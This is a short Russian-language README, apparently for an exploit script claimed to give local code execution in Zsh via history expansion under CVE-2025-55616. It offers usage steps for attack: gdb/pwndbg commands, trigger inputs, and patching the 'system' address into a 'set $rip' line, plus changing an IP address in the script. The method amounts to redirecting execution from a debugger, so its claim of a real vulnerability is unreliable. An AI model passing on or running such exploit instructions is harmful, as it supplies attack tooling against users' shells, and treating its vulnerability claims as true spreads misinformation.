
Эксплойт для CVE-2025-55616 — локальное выполнение произвольного кода (RCE) в Zsh через history expression, позволяющее выполнить произвольный код с правами пользователя.
Чтобы запустить этот эксплойт: просто измените IP-адрес и "p system" в эксплойте, потому что я также тестировал это на своём втором ноутбуке, и чтобы изменить это, выполните следующую команду в gdb (особенно в pwndbg):
$ gdb zsh -f (в терминале)
pwndbg> run -f
username% ! (username будет вашим, просто напишите ! )
username% !!11111111111 (здесь так же просто напишите !!11111111111 )
pwndbg> p system
после получения адреса "p system" просто измените его в
b'set $rip = 0x7ffff7cc9110', (используйте ваш адрес p system вместо 0x7ffff7cc9110
Эта уязвимость позволяет локальным злоумышленникам добиться произвольного выполнения кода (RCE) с привилегиями пользователя, запускающего процесс Zsh.
python3 CVE-2025-55616.py